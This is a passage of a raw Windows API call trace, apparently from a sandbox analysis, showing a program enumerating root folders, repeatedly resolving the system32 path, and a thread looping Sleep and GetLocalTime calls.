nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0130.691] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0130.691] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0130.692] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0130.692] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcdbbfc0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0130.692] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0130.692] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0130.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeafc) returned 1 [0130.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb08) returned 1 [0130.708] CoTaskMemAlloc (cb=0x20c) returned 0xbe34b0 [0130.708] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe34b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0130.708] CoTaskMemFree (pv=0xbe34b0) [0130.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0130.708] CoTaskMemAlloc (cb=0x20c) returned 0xbe34b0 [0130.708] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe34b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0130.708] CoTaskMemFree (pv=0xbe34b0) [0130.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0130.761] CoTaskMemAlloc (cb=0x20c) returned 0xbe4358 [0130.762] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe4358 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0130.762] CoTaskMemFree (pv=0xbe4358) [0130.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0130.762] CoTaskMemAlloc (cb=0x20c) returned 0xbe4358 [0130.762] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe4358 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0130.762] CoTaskMemFree (pv=0xbe4358) [0130.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.276] CoTaskMemAlloc (cb=0x20c) returned 0xbe5278 [0131.276] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe5278 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.276] CoTaskMemFree (pv=0xbe5278) [0131.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.277] CoTaskMemAlloc (cb=0x20c) returned 0xbe5278 [0131.277] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe5278 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.277] CoTaskMemFree (pv=0xbe5278) [0131.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.277] CoTaskMemAlloc (cb=0x20c) returned 0xbe5278 [0131.277] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe5278 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.277] CoTaskMemFree (pv=0xbe5278) [0131.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.353] CoTaskMemAlloc (cb=0x20c) returned 0xbe4db0 [0131.353] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe4db0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.353] CoTaskMemFree (pv=0xbe4db0) [0131.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.353] CoTaskMemAlloc (cb=0x20c) returned 0xbe4db0 [0131.353] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe4db0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.353] CoTaskMemFree (pv=0xbe4db0) [0131.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.393] CoTaskMemAlloc (cb=0x20c) returned 0xbe81f0 [0131.393] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe81f0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.393] CoTaskMemFree (pv=0xbe81f0) [0131.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.393] CoTaskMemAlloc (cb=0x20c) returned 0xbe81f0 [0131.393] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe81f0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0131.393] CoTaskMemFree (pv=0xbe81f0) [0131.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0132.026] CoTaskMemAlloc (cb=0x20c) returned 0xbe8c20 [0132.026] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe8c20 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0132.026] CoTaskMemFree (pv=0xbe8c20) [0132.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0132.026] CoTaskMemAlloc (cb=0x20c) returned 0xbe8c20 [0132.026] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe8c20 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0132.026] CoTaskMemFree (pv=0xbe8c20) [0132.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0132.139] CoTaskMemAlloc (cb=0x20c) returned 0xbea2f0 [0132.139] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbea2f0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0132.139] CoTaskMemFree (pv=0xbea2f0) [0132.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0132.139] CoTaskMemAlloc (cb=0x20c) returned 0xbea2f0 [0132.139] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbea2f0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0132.139] CoTaskMemFree (pv=0xbea2f0) [0132.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0132.227] CoTaskMemAlloc (cb=0x20c) returned 0xbeb7d8 [0132.227] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbeb7d8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0132.227] CoTaskMemFree (pv=0xbeb7d8) [0132.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0132.228] CoTaskMemAlloc (cb=0x20c) returned 0xbeb7d8 [0132.228] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbeb7d8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0132.228] CoTaskMemFree (pv=0xbeb7d8) [0132.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.507] CoTaskMemAlloc (cb=0x20c) returned 0xbecc18 [0133.507] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbecc18 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.507] CoTaskMemFree (pv=0xbecc18) [0133.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.507] CoTaskMemAlloc (cb=0x20c) returned 0xbecc18 [0133.507] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbecc18 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.507] CoTaskMemFree (pv=0xbecc18) [0133.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.507] CoTaskMemAlloc (cb=0x20c) returned 0xbecc18 [0133.507] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbecc18 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.507] CoTaskMemFree (pv=0xbecc18) [0133.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.507] CoTaskMemAlloc (cb=0x20c) returned 0xbecc18 [0133.508] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbecc18 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.508] CoTaskMemFree (pv=0xbecc18) [0133.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.620] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0133.620] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.620] CoTaskMemFree (pv=0xbed438) [0133.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.620] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0133.620] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0133.620] CoTaskMemFree (pv=0xbed438) [0133.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 Thread: id = 2 os_tid = 0xb04 [0068.589] GetTickCount () returned 0x114b31a [0068.589] Sleep (dwMilliseconds=0x3e8) [0070.827] Sleep (dwMilliseconds=0x3e8) [0071.840] Sleep (dwMilliseconds=0x3e8) [0072.854] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x5, wMilliseconds=0x14a)) [0072.854] Sleep (dwMilliseconds=0x3e8) [0073.868] Sleep (dwMilliseconds=0x3e8) [0074.882] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x7, wMilliseconds=0x166)) [0074.882] Sleep (dwMilliseconds=0x3e8) [0075.896] Sleep (dwMilliseconds=0x3e8) [0076.910] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x9, wMilliseconds=0x182)) [0076.910] Sleep (dwMilliseconds=0x3e8) [0077.924] Sleep (dwMilliseconds=0x3e8) [0078.953] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xb, wMilliseconds=0x19e)) [0078.953] Sleep (dwMilliseconds=0x3e8) [0080.077] Sleep (dwMilliseconds=0x3e8) [0081.858] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xd, wMilliseconds=0x1ca)) [0081.859] Sleep (dwMilliseconds=0x3e8) [0093.072] Sleep (dwMilliseconds=0x3e8) [0094.086] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0xf, wMilliseconds=0x1e6)) [0094.086] Sleep (dwMilliseconds=0x3e8) [0095.104] Sleep (dwMilliseconds=0x3e8) [0096.164] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x11, wMilliseconds=0x230)) [0096.164] Sleep (dwMilliseconds=0x3e8) [0097.175] Sleep (dwMilliseconds=0x3e8) [0098.189] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x13, wMilliseconds=0x24c)) [0098.189] Sleep (dwMilliseconds=0x3e8) [0099.202] Sleep (dwMilliseconds=0x3e8) [0100.216] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x15, wMilliseconds=0x268)) [0100.216] Sleep (dwMilliseconds=0x3e8) [0101.232] Sleep (dwMilliseconds=0x3e8) [0102.245] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x17, wMilliseconds=0x284)) [0102.245] Sleep (dwMilliseconds=0x3e8) [0103.289] Sleep (dwMilliseconds=0x3e8) [0104.335] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x19, wMilliseconds=0x2df)) [0104.335] Sleep (dwMilliseconds=0x3e8) [0105.364] Sleep (dwMilliseconds=0x3e8) [0106.394] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1b, wMilliseconds=0x31a)) [0106.394] Sleep (dwMilliseconds=0x3e8) [0107.408] Sleep (dwMilliseconds=0x3e8) [0109.316] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1d, wMilliseconds=0x346)) [0109.316] Sleep (dwMilliseconds=0x3e8) [0113.305] Sleep (dwMilliseconds=0x3e8) [0114.429] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1f, wMilliseconds=0x381)) [0114.429] Sleep (dwMilliseconds=0x3e8) [0115.473] Sleep (dwMilliseconds=0x3e8) [0117.173] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x21, wMilliseconds=0x3ac)) [0117.173] Sleep (dwMilliseconds=0x3e8) [0119.493] Sleep (dwMilliseconds=0x3e8) [0121.126] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x24, wMilliseconds=0x2e)) [0121.126] Sleep (dwMilliseconds=0x3e8) [0122.821] Sleep (dwMilliseconds=0x3e8) [0124.725] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x27, wMilliseconds=0x2a)) [0124.725] Sleep (dwMilliseconds=0x3e8) [0126.208] Sleep (dwMilliseconds=0x3e8) [0130.235] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x29, wMilliseconds=0x1bc)) [0130.235] Sleep (dwMilliseconds=0x3e8) [0132.028] Sleep (dwMilliseconds=0x3e8) [0133.039] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2b, wMilliseconds=0x320)) [0133.039] Sleep (dwMilliseconds=0x3e8) [0135.098] Sleep (dwMilliseconds=0x3e8) [0136.958] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x2f, wMilliseconds=0xe8)) [0136.959] Sleep (dwMilliseconds=0x3e8) [0138.396] Sleep (dwMilliseconds=0x3e8) [0139.530] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x31, wMilliseconds=0x161)) [0139.530] Sleep (dwMilliseconds=0x3e8) [0141.417] Sleep (dwMilliseconds=0x3e8) [0143.355] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x34, wMilliseconds=0x350)) [0143.355] Sleep (dwMilliseconds=0x3e8) [0144.828] Sleep (dwMilliseconds=0x3e8) [0146.650] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x37, wMilliseconds=0x29f)) [0146.650] Sleep (dwMilliseconds=0x3e8) [0148.025] Sleep (dwMilliseconds=0x3e8) [0149.312] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x3a, wMilliseconds=0x98)) [0149.312] Sleep (dwMilliseconds=0x3e8) [0150.651] Sleep (dwMilliseconds=0x3e8) [0152.222] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1, wMilliseconds=0x35)) [0152.222] Sleep (dwMilliseconds=0x3e8) [0153.518] Sleep (dwMilliseconds=0x3e8) [0154.995] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x3, wMilliseconds=0x189)) [0154.995] Sleep (dwMilliseconds=0x3e8) [0156.302] Sleep (dwMilliseconds=0x3e8) [0157.582] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x5, wMilliseconds=0x398)) [0157.582] Sleep (dwMilliseconds=0x3e8) [0159.294] Sleep (dwMilliseconds=0x3e8) [0160.763] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x8, wMilliseconds=0x20e)) [0160.763] Sleep (dwMilliseconds=0x3e8) [0162.150] Sleep (dwMilliseconds=0x3e8) [0164.005] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0xa, wMilliseconds=0x381)) [0164.005] Sleep (dwMilliseconds=0x3e8) [0166.343] Sleep (dwMilliseconds=0x3e8) [0167.578] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0xd, wMilliseconds=0x234)) [0167.578] Sleep (dwMilliseconds=0x3e8) [0169.316] Sleep (dwMilliseconds=0x3e8) [0171.031] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x10, wMilliseconds=0x220)) [0171.032] Sleep (dwMilliseconds=0x3e8) [0173.460] Sleep (dwMilliseconds=0x3e8) [0175.833] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x13, wMilliseconds=0x344)) [0175.833] Sleep (dwMilliseconds=0x3e8) [0177.063] Sleep (dwMilliseconds=0x3e8) [0178.404] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x16, wMilliseconds=0x11d)) [0178.404] Sleep (dwMilliseconds=0x3e8) [0180.289] Sleep (dwMilliseconds=0x3e8) [0181.762] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x18, wMilliseconds=0x399)) [0181.762] Sleep (dwMilliseconds=0x3e8) [0183.203] Sleep (dwMilliseconds=0x3e8) [0184.560] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1b, wMilliseconds=0x1e0)) [0184.560] Sleep (dwMilliseconds=0x3e8) [0185.761] Sleep (dwMilliseconds=0x3e8) [0187.148] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1e, wMilliseconds=0x26)) [0187.149] Sleep (dwMilliseconds=0x3e8) [0188.710] Sleep (dwMilliseconds=0x3e8) [0190.217] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x20, wMilliseconds=0x3cb)) [0190.217] Sleep (dwMilliseconds=0x3e8) [0191.925] Sleep (dwMilliseconds=0x3e8) [0193.123] GetLocalTime (in: lpSystemTime=0x2e8fbbc | out: lpSystemTime=0x2e8fbbc*(wYear=0x7e4, 